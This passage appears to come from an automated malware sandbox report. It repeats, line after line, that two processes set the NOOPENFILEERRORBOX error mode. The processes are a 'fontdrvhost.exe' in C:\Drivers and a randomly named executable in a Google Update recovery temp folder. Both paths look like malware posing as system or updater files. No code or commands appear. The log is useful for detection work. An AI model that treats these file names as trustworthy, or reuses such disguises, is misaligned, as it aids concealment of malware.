                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
